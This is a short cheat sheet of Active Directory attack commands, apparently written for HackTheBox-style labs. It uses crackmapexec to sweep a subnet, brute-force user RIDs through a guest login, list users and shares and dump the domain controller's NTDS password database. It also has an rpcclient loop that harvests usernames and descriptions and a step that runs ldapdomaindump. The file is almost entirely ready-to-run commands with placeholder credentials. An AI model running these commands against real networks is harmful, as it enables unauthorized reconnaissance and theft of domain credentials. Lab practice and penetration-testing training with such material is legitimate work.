// enumerate all windows machines in a segment
crackmapexec smb <ip/24>

// Enum users bruteforcing rids with anonymous login

crackmapexec smb <manager.htb | ip > -u 'guest' -p '' --rid-brute

// enum users 

crackmapexec smb  <ip>  --users

// dump ntds with crakmapexec

crackmapexec smb  <ip> -u '<user>' -p '<passwprd>' --ntds

// enum DC users via RCP
rpcclient -U "<dc-name>\<user>%<passwprd>" <dc-ip> -c "enumdomusers"

// enum shares

crackmapexec smb  <ip> -u '<user>' -p '<passwprd>' --shares

// enum DC users via RPC and get username and description

for rid in $(rpcclient -U "<dc-name>\<user>%<passwprd>" <dc-ip> -c "enumdomusers" | grep -oP '\[.*?\]' | grep '0x' | tr -d '[]');do echo -e "\n[+] Getting info for RID $rid:\n";rpcclient -U "<dcname>\<user>%<password>" <dc-ip> -c "queryuser $rid" | grep -E -i "user name|description";done

// enum user via LDAP
cd /var/www/html
service apache2 start
python3 ldapdomaindump.py -u "<dc-name>\<user>" -p "<password>" <dc-ip>
//check localhost:80 to see the info.